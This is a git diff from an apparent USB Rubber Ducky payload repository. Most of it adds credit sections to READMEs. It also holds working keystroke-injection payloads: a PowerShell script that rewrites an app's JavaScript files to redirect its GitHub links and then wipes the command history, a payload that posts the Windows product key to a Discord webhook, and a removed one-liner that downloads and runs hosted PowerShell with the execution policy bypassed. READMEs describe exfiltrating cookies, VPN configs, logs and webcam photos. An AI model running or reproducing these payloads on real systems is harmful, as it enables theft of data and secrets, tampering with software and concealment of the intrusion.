Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000
STRINGLN_POWERSHELL
$path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY"
$folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" }
$versions = $folders | ForEach-Object {
[PSCustomObject]@{
FolderName = $_.Name
Version = [version]($_.Name -replace "app-", "")
}
}
$latestVersionFolder = $versions | Sort-Object Version -Descending | Select-Object -First 1
$latestFolderPath = Join-Path -Path $path -ChildPath $latestVersionFolder.FolderName
$latestFolderPath += "\resources\app\"
$renderer = "renderer.js"
$main = "main.js"
$filePath = "$latestFolderPath$renderer"
$fileContent = Get-Content $filePath
$regex = [regex]'(https:\/\/(?![\w\d\.\/\-]*api)[\w\d\.\/\-]*github[\w\d\.\/\-]+)'
$modifiedContent = $fileContent -replace $regex, '#NEW_LINK'
Set-Content -Path $filePath -Value $modifiedContent
$filePath = "$latestFolderPath$main"
$fileContent = Get-Content $filePath
$regex = [regex]'openExternal\("(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"\)'
$modifiedContent = $fileContent -replace $regex, ('openExternal("#NEW_LINK")')
Set-Content -Path $filePath -Value $modifiedContent; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
END_STRINGLN

22
payloads/library/execution/SendEmailThroughThunderbird/README.md
View File

@ -46,3 +46,25 @@ DELAY 4000
- Receiver email address
- Email Subject
- Email Message
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

26
payloads/library/execution/SetArbitraryVPN_Linux/README.md
View File

@ -18,10 +18,28 @@ Opens a shell, download the vpn file, set the vpn through openvpn, erase traces.
* Internet Connection
* 'openvpn' installed
### Executing program
* Plug in your device
### Settings
* Set the VPN file link
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

24
payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/README.md
View File

@ -2,7 +2,7 @@
This script can be used to change the default DNS server in Windows 11.
**Category**: Execute
**Category**: Execution
## Description
@ -16,3 +16,25 @@ The script open the settings, then go to network settings, then go to wi-fi sett
REM DNS IPv4 like Cloudflare DNS 1.1.1.1
DEFINE DNS example
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

2
payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt
View File

@ -3,7 +3,7 @@ REM # |
REM # Title : Set An Arbitrary DNS (IPv4 version) |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execute |
REM # Category : Execution |
REM # Target : Windows 11 |
REM # |
REM ########################################################

24
payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/README.md
View File

@ -2,7 +2,7 @@
This script can be considered by people who are new to the world of scripts written in DuckyScript so that they can understand how to start a PowerShell with administrator permissions on a Windows machine.
**Category**: Execute
**Category**: Execution
## Description
@ -28,3 +28,25 @@ It is important to note that running PowerShell with administrator privileges in
- `STRINGLN Get-ExecutionPolicy -List`
![](docs/3.png)
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

2
payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt
View File

@ -3,7 +3,7 @@ REM #
REM # Title : Starting a PowerShell with administrator permissions in Windows |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execute |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM ####################################################################################

22
payloads/library/execution/Stop_A_Single_Process_In_Windows/README.md
View File

@ -19,3 +19,25 @@ This script open the Task Manager app, then go to search bar, then write the pro
- Write the name of the process that you want to stop
`DEFINE PROCESS_NAME example`
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

22
payloads/library/execution/UninstallSignal/README.md
View File

@ -18,3 +18,25 @@ Open a PowerShell, stop the Signal proccess if it runs and then execute the unin
## Settings
- Nothing to set, this payload is Plug-And-Play <3
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

70
payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt
View File

@ -1,25 +1,69 @@
REM ###############################################################
REM # |
REM # Title : Create And Exfiltrate A Webhook Of Discord |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ###############################################################
REM_BLOCK
###############################################################
# #
# Title : Create And Exfiltrate A Webhook Of Discord #
# Author : Aleff #
# Version : 1.0 #
# Category : Exfiltration #
# Target : Windows 10-11 #
# #
###############################################################
END_REM
REM Requirements:
REM - Internet connection
REM - Discord Installed
REM You must define the Discord server name i.e. Hak5
DEFINE #SERVER_NAME example
REM You must define your Discord webhook if you want to use this method for the exfiltration
DEFINE #DISCORD_WEBHOOK example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Discord app
GUI
DELAY 1000
@ -74,11 +118,11 @@ TAB
DELAY 500
TAB
DELAY 500
DOWN_ARROW
DOWNARROW
DELAY 500
DOWN_ARROW
DOWNARROW
DELAY 500
DOWN_ARROW
DOWNARROW
DELAY 500
ENTER
DELAY 500

22
payloads/library/exfiltration/Exfiltrate Computer Screenshots/README.md
View File

@ -27,3 +27,25 @@ Open a PowerShell, download the Python script and execute it. The Python script
- Setup your Python script link in the payload.txt file
- Setup your Discord webhook link in the script.py file
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

22
payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md
View File

@ -30,3 +30,25 @@ Opens a shel, zip all zippable (R permission) content of the folder, send the zi
* Set your dropbox access token
* Set the folder path interessed (i.e. /Documents)
* Change (if you think that it is necessary) the delay of the zipping operation
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

22
payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
View File

@ -31,3 +31,25 @@ Opens a shel, zip all zippable (R permission) content of the log folder, send th
* Set your dropbox access token
* Change if needed the folder path interessed (i.e. /var/log)
* Change (if you think that it is necessary) the delay of the zipping operation
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

26
payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md
View File

@ -18,10 +18,28 @@ Opens a shell, get the network card name, get the network configuration using nm
* Internet Connection
* Dropbox Token
### Executing program
* Plug in your device
### Settings
* Set the Dropbox token
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

26
payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/README.md
View File

@ -17,11 +17,29 @@ Opens a shell, get the network card name, get the network traffic using tcpdump,
* Permissions
* Internet Connection
### Executing program
* Plug in your device
### Settings
* Set the Dropbox token
* Set the sniffing filter
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

26
payloads/library/exfiltration/ExfiltratePhotosThroughShell/README.md
View File

@ -18,10 +18,6 @@ A script used to exfiltrate photos using fswebcam shell command. The permissions
* sudo permission
* 'fswebcam' installed but you can install it with the payload
### Executing program
* Plug in your device
### Settings
* Dropbox Token - You should change it into the script.sh file, line 7.
@ -54,3 +50,25 @@ REM DELAY 5000
REM DELAY Based On Internet Power
DELAY 4000
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

26
payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/README.md
View File

@ -18,10 +18,28 @@ Opens a shell, get the process info, set the Discord webhook configuration, send
* Internet Connection
* Discord Webhook
### Executing program
* Plug in your device
### Settings
* Set the Discord Webhook configuration
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

26
payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/README.md
View File

@ -27,10 +27,28 @@ Finally, the Invoke-RestMethod cmdlet of PowerShell is used to send an HTTP POST
* An internet connection
* Windows 10,11
### Executing program
* Plug in your device
### Settings
* Dropbox Webhook
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

95
payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md Normal file
View File

@ -0,0 +1,95 @@
# Exfiltrate Windows Product Key
Through this payload, you can export the key information related to the Windows Product Key, knowing its type and the key itself, using a Discord Webhook.
No administrator permissions are required to do this, isn't that absurd, right? :-)
![](./assets/1.png)
**Category**: Exfiltration
## Index
- [Introduction](#exfiltrate-windows-product-key)
- [Note](#note)
- [Dependencies](#dependencies)
- [Settings](#settings)
- [Payload Description](#payload-description)
- [Product Key Types](#product-key-types)
- [Sources](#sources)
## Note
Tested on:
- Windows 11
## Dependencies
- Discord Webhook
## Settings
This portion of the payload serves as a user-defined configuration section where you should input your Discord Webhook URL. You should replace "example.com" with the actual Discord Webhook URL you want to use. The Webhook URL is the endpoint where your payload will send the acquired information related to the Windows Product Key, as well as its type, for exfiltration to a specified Discord channel or server. It's a crucial part of the payload that connects the data extraction process to your Discord platform for further analysis or actions.
```DuckyScript
DEFINE #DISCORD_WEBHOOK example.com
```
## Payload Description
Through this payload, you can export essential information related to the Windows Product Key using a Discord Webhook, ensuring that you identify its type and the key itself.
At the beginning of the payload, the DETECT_READY extension [[1](#sources)] is used to optimize the opening of a PowerShell session on the target.
The following commands are then executed to obtain the necessary information about the Product Key:
1. This command retrieves the currently in-use Product Key:
```powershell
wmic path softwarelicensingservice get OA3xOriginalProductKey
```
2. This command helps determine the type of key. You can refer to the [key types section](#key-types) for more details:
```powershell
wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription
```
The acquired information is stored in the `$exfiltration` variable, which is subsequently used to create the `$payload` object. This object is then utilized for exfiltration via a Discord Webhook.
**Exfiltration via Discord Webhook**:
The `$hookUrl` variable was initialized at the beginning of the payload with the value you need to define before execution.
```powershell
Invoke-RestMethod -Uri $hookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'Application/Json'; exit
```
**Exfiltration via USB Rubber Ducky Storage**:
If you use the exfiltration method set up to retain data using Rubber Ducky's USB storage, you will not have to make any changes.
## Product Key Types
When dealing with Windows Product Keys, it's essential to understand the different types and their characteristics:
- **OEM Keys** (*Original Equipment Manufacturer*):
**Transferability**: Not supposed to be transferable. These keys are typically tied to the prebuilt PC on which they were originally installed.
**Usage**: Manufacturers use OEM keys to install Windows on new computers.
**Procurement**: OEM keys can sometimes be found at discount key vendors, although their use on different hardware may be challenging.
- **Retail Keys** (*aka "Full Packaged Product" Keys*):
**Transferability**: Transferrable. These keys can be moved from one computer to another.
**Cost**: Retail keys are often more expensive, often exceeding $100.
**Hidden Keys**: In some cases, a computer may already have a retail key, perhaps from a previous Windows upgrade. Users might not be aware of this until they check.
Understanding these key types is crucial when working with Windows Product Keys, as it can impact their use, transferability, and compatibility with different hardware and scenarios.
*Note: Source of this info [[2](#sources)]*
## Sources
- [1] Detect Ready: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
- [2] Is your Windows Product Key transferrable? https://www.tomshardware.com/how-to/transfer-windows-license-to-new-pc#is-your-windows-product-key-transferrable-3

BIN
payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/assets/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 25 KiB

82
payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt Normal file
View File

@ -0,0 +1,82 @@
REM_BLOCK
###################################################
# |
# Title : Exfiltrate Windows Product Key |
# Author : Aleff |
# Version : 1.0 |
# Category : Exfiltration |
# Target : Windows 10-11 |
# |
###################################################
END_REM
REM Put here your Discord Webhook, i.e. https://discord.com/api/webhooks/0123456789.../abcefg...
DEFINE #DISCORD_WEBHOOK example.com
REM_BLOCK
How would you prefer to do the exfiltration?
Via Discord Webhooks or via Rubber Ducky USB storage?
If you prefer to use the storage offered by USB Rubber Ducky, set the boolean variable #USB_RUBBER_DUCKY_STORAGE to TRUE, otherwise set it to FALSE and the alternative mode will be automatically selected, so via Discord Webhook.
END_REM
DEFINE #USB_RUBBER_DUCKY_STORAGE TRUE
REM_BLOCK
This definition allows the drive label to be parameterized dynamically.
Instead of hardcoding the "DUCKY" label throughout the script, we use a defined variable at the beginning that can be easily adjusted.
This way, if the drive label changes or needs to be customized for different environments, you only need to update this definition without altering multiple instances in the code. Its an approach that enhances the script's flexibility and maintainability.
END_REM
DEFINE #DUCKY_DRIVE_LABEL DUCKY
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
GUI r
DELAY 1000
STRINGLN powershell
DELAY 2000
STRINGLN $key_detected=$(wmic path softwarelicensingservice get OA3xOriginalProductKey)+$(wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription);
IF_DEFINED_TRUE #USB_RUBBER_DUCKY_STORAGE
STRINGLN
$m=(Get-Volume -FileSystemLabel '#DUCKY_DRIVE_LABEL').DriveLetter;
echo $key_detected >> ${m}:\exfiltration.txt
END_STRINGLN
END_IF_DEFINED
IF_NOT_DEFINED_TRUE #USB_RUBBER_DUCKY_STORAGE
STRINGLN
$hookUrl = "#DISCORD_WEBHOOK"
$exfiltration = @"$key_detected"@
$payload = [PSCustomObject]@{
content = $exfiltration
}
Invoke-RestMethod -Uri $hookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'Application/Json'; exit
END_STRINGLN
END_IF_DEFINED

24
payloads/library/exfiltration/Export_Cookies_From_Firefox/README.md
View File

@ -18,4 +18,26 @@ Open a PowerShell, select dynamically the Firefox path adding "cookies.sqlite" a
- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
`DEFINE DROPBOX_ACCESS_TOKEN "example"`
`DEFINE DROPBOX_ACCESS_TOKEN "example"`
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

22
payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/README.md
View File

@ -46,3 +46,25 @@ This script open the Firefox app, then go to downloads page and copy all, then o
Invoke-RestMethod -Uri $WebhookUrl -Method Post -Body $Payload -ContentType 'application/json'
}
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

21
payloads/library/exfiltration/ProtonVPN-config/README.md
View File

@ -35,3 +35,24 @@ Then it cleans up traces of what you have done after.
* Invoke Get-Content for get in plaintext the ProtonVPN .config content
* Invoke-WebRequest will be entered in the Run Box to send the content
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

2
payloads/library/exfiltration/Windows-Product-Key-Grabber/README.md
View File

@ -8,7 +8,7 @@
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
</a>
<a href="#">
<img alt="VERSION: 1.1" src="https://img.shields.io/badge/VERSION-1.1-green?style=for-the-badge">
<img alt="VERSION: 1.2" src="https://img.shields.io/badge/VERSION-1.2-green?style=for-the-badge">
</a>
</p>

37
payloads/library/exfiltration/Windows-Product-Key-Grabber/payload.txt
View File

@ -3,7 +3,7 @@ REM_BLOCK DOCUMENTATION
Author: PlumpyTurkey
Description: This payload sends you the target PC's Windows product key via Dropbox.
Target: Windows 10, 11
Version: 1.1
Version: 1.2
Category: Exfiltration
END_REM
@ -108,39 +108,4 @@ EXTENSION WINDOWS_ONLY
END_IF
END_EXTENSION
EXTENSION RUN_HOSTED_POWERSHELL
REM_BLOCK DOCUMENTATION
Title: Run Hosted PowerShell
Author: PlumpyTurkey
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
Target: Windows 10, 11
Version: 1.0
END_REM
REM Required options:
DEFINE #RHP_SCRIPT_URL example.com
REM Advanced options:
DEFINE #RHP_DELAY 2000
DEFINE #RHP_ELEVATED_EXECUTION FALSE
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
GUI r
DELAY #RHP_DELAY
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
CTRL SHIFT ENTER
DELAY #RHP_DELAY
LEFT
END_IF_DEFINED
ENTER
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
ATTACKMODE OFF
END_IF_DEFINED
END_EXTENSION
RHP_RUN()

20
payloads/library/exfiltration/Windows-netstat/README.md
View File

@ -38,4 +38,24 @@ Functions available:
- proto **$p "\<protocol>"**
- *In this option you must put the protocol that you want to monitor, for example $proto="TCP" if you want to monitor TCP, else leave blank, so $proto="".*
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

2
payloads/library/exfiltration/all-info-to-dropbox Normal file
View File

@ -0,0 +1,2 @@
i don't know how to add file wait

26
payloads/library/prank/Alien Message From Computer/README.md
View File

@ -18,10 +18,6 @@ Open a PowerShell, download the Python script and execute it. The Python script
* ExecutionPolicy Bypass
* Python
### Executing program
* Plug in your device
### Settings
* Nothing to setup, it is Plug-And-Play
@ -30,3 +26,25 @@ Open a PowerShell, download the Python script and execute it. The Python script
- Why is the code in one line?
- In Python if TAB errors are made then execution is blocked so to avoid writing so many DuckyScript STRING elements I wrote everything in one line separating each command by a semicolon. However, the code can be viewed entirely in the script.py file and edited as desired.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

22
payloads/library/prank/Change Wallpaper With Screenshot/README.md
View File

@ -21,3 +21,25 @@ Open a PowerShell, download the Python script and execute it. The Python script
### Settings
- Setup your Python script link in the payload.txt file
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

26
payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/README.md
View File

@ -17,11 +17,29 @@ Opens a shell, download the image, define the local image path, run a command KD
* Internet Connection
* Linux KDE
### Executing program
* Plug in your device
### Settings
- Image link
- Local image path
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
